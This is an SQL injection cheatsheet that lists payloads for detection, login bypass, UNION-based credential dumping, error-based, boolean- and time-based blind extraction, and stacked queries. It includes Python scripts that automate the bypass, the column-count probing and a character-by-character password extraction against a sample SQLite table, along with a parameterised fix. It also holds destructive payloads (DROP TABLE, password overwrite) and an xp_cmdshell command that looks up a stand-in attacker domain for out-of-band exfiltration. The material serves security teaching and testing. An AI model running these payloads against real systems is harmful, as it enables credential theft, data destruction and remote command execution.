# SQL Injection Cheatsheet
## Detection
Inject each probe into a parameter and compare the response with a clean request. A database error on `'` that disappears on `''` (a valid escaped quote) is the classic sign that input reaches the query unescaped; the remaining probes tell you which comment and terminator syntax the backend accepts.
- ' (single quote)
- '' (two single quotes, i.e. one escaped quote)
- ` (backtick, MySQL identifier quote)
- ; (semicolon, statement terminator)
- -- (comment; MySQL requires whitespace after it, so use `-- ` or `-- -`)
- # (MySQL comment)
- /* */ (multi-line comment)
## Authentication Bypass
For a login of the form `WHERE username='<input>' AND password='<input>'`. The bare `' OR '1'='1` goes in the password field (in the username field, AND binds tighter than OR and the password check still applies); the commented variants go in the username field and discard everything after the comment.
```
' OR '1'='1
' OR '1'='1' --
' OR '1'='1'/*
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
```
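The detection and bypass rows above, driven against a vulnerable query, as an added example that is not part of the original cheatsheet. It uses Python's built-in `sqlite3` with a constructed in-memory users table; `login_vulnerable`, `login_safe` and `probe` are hypothetical names chosen here. The vulnerable login concatenates input into the SQL text, the safe one binds it as a parameter, and `probe` shows the `'` versus `''` detection signal.

```python
import sqlite3


# Constructed in-memory stand-in for the application's user table (sample data, not real).
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("admin", "s3cr3t"), ("alice", "wonderland")])
    return con


def login_vulnerable(con: sqlite3.Connection, username: str, password: str):
    """The injection sink: user input is concatenated straight into the SQL text."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(con: sqlite3.Connection, username: str, password: str):
    """Same query with bound parameters: the input is data and never becomes SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = con.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def probe(con: sqlite3.Connection, payload: str) -> str:
    """Detection step: send one probe in the username field and classify the
    outcome. A syntax error on ' that disappears on '' shows the input is
    spliced into the query unescaped."""
    try:
        login_vulnerable(con, payload, "x")
        return "ok"
    except sqlite3.Error:
        return "error"


def demo() -> dict:
    con = make_db()
    return {
        # Detection: ' breaks the statement, '' is a valid escaped quote.
        "probe_quote": probe(con, "'"),
        "probe_double_quote": probe(con, "''"),
        # Bypass: OR makes the WHERE clause true, -- comments out the password check.
        "bypass_or": login_vulnerable(con, "' OR '1'='1' --", "wrong"),
        # Bypass: log in as a chosen user by commenting out the rest of the clause.
        "bypass_admin": login_vulnerable(con, "admin' --", "wrong"),
        # The same payload against the parameterised query matches no row.
        "safe": login_safe(con, "' OR '1'='1' --", "wrong"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

Run it directly to see the five outcomes; the point of `login_safe` is that the exact payload which returns `admin` from the concatenated query returns `None` once the value is bound as a parameter.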
## Union-Based
Add one NULL per attempt until the error stops: that count is the number of columns in the original SELECT, and NULL is accepted in any column type. Then replace slots with the columns to read, keeping the same count.
```
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT username,password FROM users--
```
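The column-count discovery and credential dump above, automated against a vulnerable search query, as an added example that is not part of the original cheatsheet. It uses Python's built-in `sqlite3` with a constructed in-memory database; `search_vulnerable`, `find_column_count` and `dump_credentials` are hypothetical names chosen here. SQLite is dynamically typed, so only the column count has to match; on MSSQL or Oracle the types must also be compatible, which is exactly why the probing stage uses NULL.

```python
import sqlite3


# Constructed in-memory stand-in for the target database (sample data, not real).
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL)")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO products VALUES (?, ?, ?)",
                    [(1, "widget", 9.5), (2, "gadget", 19.0)])
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("admin", "s3cr3t"), ("alice", "wonderland")])
    return con


def search_vulnerable(con: sqlite3.Connection, term: str) -> list:
    """Injection sink: a product search whose LIKE pattern is concatenated from input."""
    sql = "SELECT id, name, price FROM products WHERE name LIKE '%" + term + "%'"
    return con.execute(sql).fetchall()


def find_column_count(con: sqlite3.Connection, max_cols: int = 10):
    """Append one more NULL per attempt until the UNION no longer errors.
    NULL is accepted in any column, so the first success gives the column count."""
    for n in range(1, max_cols + 1):
        payload = "' UNION SELECT " + ",".join(["NULL"] * n) + "--"
        try:
            search_vulnerable(con, payload)
            return n
        except sqlite3.OperationalError:
            # column-count mismatch between the two SELECTs: try one more
            continue
    return None


def dump_credentials(con: sqlite3.Connection, ncols: int) -> list:
    """Put username and password in the first two slots and pad the rest with
    NULL so the injected SELECT matches the original's column count."""
    cols = ["username", "password"] + ["NULL"] * (ncols - 2)
    payload = "' UNION SELECT " + ",".join(cols) + " FROM users--"
    rows = search_vulnerable(con, payload)
    # Injected rows are the ones whose padding column is NULL; genuine product
    # rows always carry a price.
    creds = [(r[0], r[1]) for r in rows if r[2] is None]
    return sorted(creds)


def demo() -> tuple:
    con = make_db()
    n = find_column_count(con)
    return n, dump_credentials(con, n)


if __name__ == "__main__":
    print(demo())
```

The trailing `--` in each payload comments out the `%'` that the application appends, which is what keeps the injected UNION syntactically valid.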
## Error-Based (MSSQL)
CONVERT to int fails on a string value, and the error message quotes the value it could not convert.
```
' AND 1=CONVERT(int, (SELECT @@version))--
' AND 1=CONVERT(int, (SELECT user))--
```
## Boolean-Based Blind
Confirm that 1=1 and 1=2 produce different responses, then ask one yes/no question per character.
```
' AND 1=1--
' AND 1=2--
' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a'--
```
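The character-by-character extraction loop behind the SUBSTRING payload above, as an added example that is not part of the original cheatsheet. It uses Python's built-in `sqlite3` with a constructed in-memory users table; `user_exists_vulnerable`, `oracle` and `extract` are hypothetical names chosen here. The vulnerable endpoint leaks only whether a row came back, and SQLite spells SUBSTRING as `substr()`; everything else carries over to MSSQL or MySQL unchanged.

```python
import sqlite3
import string


# Constructed in-memory stand-in for the target database (sample data, not real).
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("admin", "s3cr3t!"), ("alice", "wonderland")])
    return con


def user_exists_vulnerable(con: sqlite3.Connection, username: str) -> bool:
    """Injection sink that leaks a single bit: whether a row came back
    (think 'user found' versus 'user not found' on the page)."""
    sql = "SELECT 1 FROM users WHERE username = '" + username + "'"
    return con.execute(sql).fetchone() is not None


def oracle(con: sqlite3.Connection, condition: str) -> bool:
    """Ask the application a yes/no question: the row for admin is returned
    only when the injected condition is true."""
    return user_exists_vulnerable(con, "admin' AND (" + condition + ")--")


def extract(con: sqlite3.Connection, subquery: str, max_len: int = 64) -> str:
    """Recover the result of `subquery` one character at a time. substr() is
    SQLite's SUBSTRING; the position argument is 1-based as on MSSQL/MySQL."""
    alphabet = string.digits + string.ascii_letters + string.punctuation
    result = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            lit = ch.replace("'", "''")  # keep the probe itself syntactically valid
            cond = f"substr(({subquery}),{pos},1)='{lit}'"
            if oracle(con, cond):
                result += ch
                break
        else:
            # No candidate matched: past the end of the string (or a character
            # outside the alphabet; widen it if the value looks truncated).
            break
    return result


def demo() -> dict:
    con = make_db()
    return {
        # Baseline pair from the cheatsheet: the two responses must differ.
        "true_baseline": oracle(con, "1=1"),
        "false_baseline": oracle(con, "1=2"),
        "admin_password": extract(con, "SELECT password FROM users WHERE username='admin'"),
    }


if __name__ == "__main__":
    print(demo())
```

Each recovered character costs up to one request per alphabet symbol; a binary search on the character's code (`unicode()` on SQLite, `ASCII()` on MSSQL/MySQL) cuts that to about seven requests per character, which is what tools do in practice.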
## Time-Based Blind
Measure the response time against a baseline request; the delay only fires when the injected condition is true.
MSSQL:
```
'; WAITFOR DELAY '0:0:5'--
'; IF (1=1) WAITFOR DELAY '0:0:5'--
```
MySQL (SLEEP returns after the delay; BENCHMARK burns CPU instead and is noisier):
```
' AND SLEEP(5)--
' AND BENCHMARK(10000000,MD5('test'))--
```
## Stacked Queries
Only where the driver executes several statements in one call (typical for MSSQL and PostgreSQL; most MySQL client APIs refuse it).
```
'; DROP TABLE users--
'; INSERT INTO users VALUES('hacker','password')--
'; UPDATE users SET password='hacked' WHERE username='admin'--
```
## Out-of-Band (MSSQL)
The DNS lookup reaches an attacker-controlled nameserver regardless of what the HTTP response shows. xp_cmdshell is disabled by default and needs sysadmin rights to enable through sp_configure.
```
'; EXEC master..xp_cmdshell 'nslookup attacker.com'--
```